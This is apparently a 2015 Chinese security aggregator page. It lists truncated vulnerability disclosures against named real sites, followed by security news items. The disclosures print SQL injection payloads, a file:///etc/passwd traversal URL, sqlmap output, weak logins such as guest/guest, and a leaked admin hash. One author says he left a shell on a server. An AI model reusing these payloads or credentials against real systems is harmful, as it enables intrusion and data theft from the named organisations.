记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

悦动圈后台弱口令致百万会员信息泄露可提现可推送广告等

后台地址为:http://cms.51yund.com/sport/index.php1、之前拿了他们数据库,放了shell没有删除。对这个后台一直“虎视眈眈”。但是数据库不在之前已拿的数据库。登录的用户是手机号,社工了作者khb.***@***.com无效。换了个思路,之前的数据库里面应该有测试信息,说不准某个手机号就可以登录呢?2、数据库里面查询了‘hai’'况'等,先搜集几个 试用就OK。还有最开始的几个用户为测试的。都搜集一起,一起测试3、在后台用这些手机号进行登录测试,鉴于之前的数据库为root、root口令,这里继续用123456测试,后来得知某手机号可以登录后台1868****150123456 漏洞证明:1、登录后台,用户量100W。后台有权限可以进行修改、删除用户等操作2、
发布时间:2015-03-29 03:05 | 阅读:115 | 评论:0 | 标签:无

民生电商奇葩设计缺陷导致用户cookie泄漏(跨域获取)

首先,网站有这样一个页面,www.minshengec.com/common/getListCookie.jhtml?callback=jQuery183038446558504106043_1423473509362&cookName=%5B%22memberUsername%22%2C%22JSESSIONID%22%2C%22mssc_sid%22%5D&_=1423473510555 你猜的没错,就是读取cookie的,更换下cookie的名称,就可以完美读取了。本来是httponly的cookie,如jsession什么的,这下就可以一网打尽了。你懂的,xss这种漏洞,很容易找的。 漏洞证明: 修复方案:你们牛叉,你们懂的。
发布时间:2015-03-29 03:05 | 阅读:37 | 评论:0 | 标签:无

新浪论坛子论坛通用注入

如图存在的子论坛如上随便选两个证明 漏洞证明:http://club.history.sina.com.cn/http://club.history.sina.com.cn/faq.php?action=message&id=2%df' and 1=2 UNION SELECT 1,2,3,4,5,6,user()%23http://club.baby.sina.com.cn/http://club.baby.sina.com.cn/faq.php?action=message&id=2%df' and 1=2 UNION SELECT 1,2,3,4,5,6,user()%23返回信息特殊 中转一下扔到萝卜头里可以跑code 区域<?php$url = "h
发布时间:2015-03-29 03:05 | 阅读:32 | 评论:0 | 标签:注入

四川航空某系统存在SQL注入

code 区域POST /ffpnewweb/mall/getlist HTTP/1.1Content-Length: 90Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://ffp.scal.com.cn:80/Cookie: ASP.NET_SessionId=ggzz2kwu5vmschgx11he0nawHost: ffp.scal.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/53
发布时间:2015-03-29 03:05 | 阅读:11 | 评论:0 | 标签:注入

Directory traversal on *.aol.com [2](db password leaked)

Directory traversal:code 区域http://optimization.aol.com/tools/roboto/?url=file:///etc/passwdWith file protocol(file:///) we can read local files, more than 800 employee's usernames can be downloaded, which can be used to brute SMTP, VPN and other services.I use these usernames to fuzz .bash_history accessibility with Burp Suite.Finally, I found file:///h
发布时间:2015-03-29 03:05 | 阅读:15 | 评论:0 | 标签:无

盛大游戏某分站存在sql注入/可读文件

该分站存在注入:http://mxd.games.sdo.com/ 漏洞证明:注入点:http://mxd.games.sdo.com/knowledge/search/123*123处存在注入,搜索型注入。直接上sqlmaproot权限呢读一下文件code 区域sqlmap identified the following injection points with a total of 79 HTTP(s) requests:---Place: POSTParameter: keyword Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keyword=1%
发布时间:2015-03-29 03:05 | 阅读:71 | 评论:0 | 标签:注入

比亚迪某管理系统存在命令执行(已入内网)

和这个漏洞很类似 但是处于不同域名和 IP这是不同的2个站http://wooyun.org/bugs/wooyun-2010-094793登入页面:http://dcrm.byd.com.cn存在ST2执行漏洞 很简单就getshell了数据库连接提权转发又入内网结束 漏洞证明: 修复方案:希望厂商多打补丁 这个漏洞虽然老但是很致命
发布时间:2015-03-29 03:05 | 阅读:47 | 评论:0 | 标签:无

中国电信某平台SQL注入大量数据泄露

code 区域http://218.30.22.96/reg_app/dx_ajax.php?key=记录数目为 : 128025904ROOT权限,管理密码为code 区域admin,ff8a74f0a75b757f597cce1ae315b82f读系统文件:code 区域root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:
发布时间:2015-03-29 03:05 | 阅读:38 | 评论:0 | 标签:注入

中石化某日志分析和防火墙分析系统弱口令/内网一览无余/可内网服务器监听端口

http://124.127.48.20:8080/fw/mindex.do?tab=home SGEC Firewall Analyzer系统弱口令帐号guest 密码guest通过internet的使用可发现是中石化的网站http://124.127.48.19/web/Login.aspxhttp://124.127.48.21:8080/event/index3.do 中石化日志分析系统弱口令guest guest可查看登录成功用户并且可以对数据库进行sql查询可以监听内网端口 漏洞证明:http://124.127.48.20:8080/fw/mindex.do?tab=home SGEC Firewall Analyzer系统弱口令帐号guest 密码guesthttp://124.127.48.2
发布时间:2015-03-29 03:05 | 阅读:10 | 评论:0 | 标签:防火墙

兴业银行某业务SQL注入漏洞

........... 漏洞证明:code 区域http://ccgolf.cib.com.cn/cibweb/equ/tgcount.jsp?group=14412 注入点available databases [12]:[*] APEX_030200[*] CTXSYS[*] EXFSYS[*] GOLF2[*] HKCRM[*] HKKINGPASS[*] MDSYS[*] OLAPSYS[*] SY@TEM[*] SYS[*] XDB[*] YH@RMDatabase: GOLF2[984 tables]+-------------------------------+| "" || "??????5"
发布时间:2015-03-29 03:05 | 阅读:31 | 评论:0 | 标签:注入 漏洞

第三方通信工具Slack遭黑客攻击

早间消息,企业管理服务创业公司Slack周五称,该公司在2月遭遇的一次黑客攻击可能已导致手机号码和Skype ID等用户信息泄露。 Slack总部位于旧金山,提供可与谷歌Hangout和Twitter等多个第三方应用整合的通信工具,其客户包括纽约时报公司、流媒体音乐服务提供商Spotify和美国短租网站Airbnb等。 Slack周五发表博文称,从目前正在进行的一项调查来看,并无迹象表明黑客能解码其储存的密码。此次黑客攻击活动持续了大约四天,期间并无财务或支付信息泄露。Slack表示,调查发现一些账户存在“可疑活动”,并已就此向受影响用户发出通知。 网络黑客已成为企业面临的最大威胁之一,索尼和零售巨头塔吉特等公司都在最近遭到了黑客攻击。(唐风)
发布时间:2015-03-28 22:25 | 阅读:134 | 评论:0 | 标签:业界 Hangout Slack 攻击 黑客

以色列备战黑客组织“2015电子大屠杀”

科技日报特拉维夫3月27日电 (记者冯志文)正当以色列网络安全产业界、学术界和政府部门沉浸在2015网络技术展巨大成功的喜悦中时,黑客帝国鼎鼎大名的“匿名者”黑客组织发布视频,称将在4月7日对以色列发动“电子大屠杀”,进攻政府、军事、金融、公共机构网站,将以色列从网络世界抹去,以警告和报复以色列政府对巴勒斯坦的“不公”。 事实上,每年的4月7日,以色列的网络世界都会风云再起、充满刀光剑影,曾与以色列“阵亡将士纪念日”巧合的这一天,成为“匿名者”组织动员其全球精英发动“反以色列行动”的标志性日子,当然也成为检验以色列网络防御能力的“试金石”和锻炼网络攻防能力的“试验场”。 在过去的屡次攻防战中,“匿名者”虽然没有给以色列造成“致命伤”,但也会让其“惊出一身冷汗”。据以色列媒体报道,2013年4月7日,“匿名者”组
发布时间:2015-03-28 22:25 | 阅读:60 | 评论:0 | 标签:业界 以色列 匿名者 电子大屠杀 黑客

传奇黑客米特尼克:曾入狱5年 51岁还孜孜不倦

对凯文·米特尼克(Kevin Mitnick)来说,有些事情从来都没改变过。不说别的,单是从他的名片就能看出这一点。 他的名片是用不锈钢切片制成的,包含可以拆卸的组件,能组成一套功能齐备的撬锁工具。对于他这样一个最早是罪犯、现在则拥有了合法身份的撬锁高手——无论是虚拟的数字锁,还是真的锁——来说,这是一种很合适的象征。 我们会面的地点是在德国的汉诺威,他在本月被邀请出席CeBit科技大会做有关网络安全的讲座。大会组织者承担了相关费用,而对米特尼克给出的身份介绍则是“世界上最有名的黑客”。这个头衔是他在上个世纪赚来的,当时整个世界对于互联网的存在还处在半梦半醒的懵懂状态。在那时,米特尼克曾是美国联邦调查局(FBI)在两年时间里最想抓到的罪犯,到最后这场追逐以1995年他在北卡罗来纳州被捕而告终。 《纽约时报》曾
发布时间:2015-03-28 22:25 | 阅读:119 | 评论:0 | 标签:业界 凯文·米特尼克 测试 黑客

韩陆军举行黑客防御大赛 提高应对网络入侵能力

据韩联社3月27日报道,为提高应对网络入侵及诊断网络薄弱部分的能力,韩国陆军26日在大田市儒城区自云台内的陆军信息通信学校举行了2015黑客防御大赛。 据报道,本次大赛共有99人参加,包括信息保护专员和服务器及网络管理者等。比赛就最近发生的韩国水力原子力公司遭黑客袭击事件及在公共机关发行网上个人识别号码(I-PIN)等事件进行磋商,着力提高应对网络入侵的能力。 本次比赛以服务器、网络和主页为对象,通过综合评价探测入侵黑客能力、分析和识别有害病毒代码等方式进行。此外,在韩国网络振兴院的协助下,此次大赛将通过最新型的黑客技术问题来评价高难度实战防御技术能力。 韩国陆军一名大校表示,“要想在日益严峻的黑客威胁下保护军队信息体系并强化应对能力,当务之急莫过于培养网络尖端技术人才”。
发布时间:2015-03-28 22:25 | 阅读:107 | 评论:0 | 标签:业界 韩国 黑客

功能强大的Vawtrak银行木马在多国肆虐

安全研究人员发现了一个传播Vawtrak银行木马的恶意活动。它们的目标是加拿大的多个银行客户。 这个恶意软件也被称为Neverquest及Snifula。它是一款先进的恶意软件,通过远程桌面控制被攻陷计算机隐藏痕迹,随后窃取金融信息、进行交易。 恶意软件作者依赖实时网络注入技巧为受害者展现欺骗性屏幕,要求获得访问在线银行账户的必要信息。 这种方法还可捕获通过单独token获取且基于离线卡验证或PIN号码的双因素认证代码。 命令及控制服务器注册于今年2月份 Heimdal安全公司的研究员分析指出,网络犯罪分子传播Vawtrak的方法包括路过式下载攻击、社交媒体网站上的钓鱼活动、以及垃圾邮件方式。 研究人员表示,这个变种的攻击目标是位于加拿大的愈15家金融机构,并且连接了位于世界不同地区的6个命令及控制服务器。在
发布时间:2015-03-28 22:25 | 阅读:83 | 评论:0 | 标签:业界 AVG Vawtrak 银行木马

爱卡汽车某重要系统SQL注入导致进后台(泄漏员工信息)

URL: http://bangong.xcar.com.cn/爱卡的OA系统首先通过这个地址 发现用了thinkphp 3.1.3版本http://bangong.xcar.com.cn/Admin/index.php?s=/Public/main.html而且开启了gpc 所以注入过程中不能存在单引号根据ph大大 的最新版thinkphp注入漏洞可确定该版本可注入在登录框构造 如下语句 account[0]=(注入语句)between&account[1]=a&password=wooyun123这样后台执行的sql语句是 select * from user where `username` (注入语句)BETWEEN 'a' AND null 尝试发送如下表单让它报错
发布时间:2015-03-28 14:00 | 阅读:71 | 评论:0 | 标签:注入

公告

❤ 关注Hackdig微博,点击下方按钮⇩
关注Hackdig微信,学习技术更方便

工具

推而广之

标签云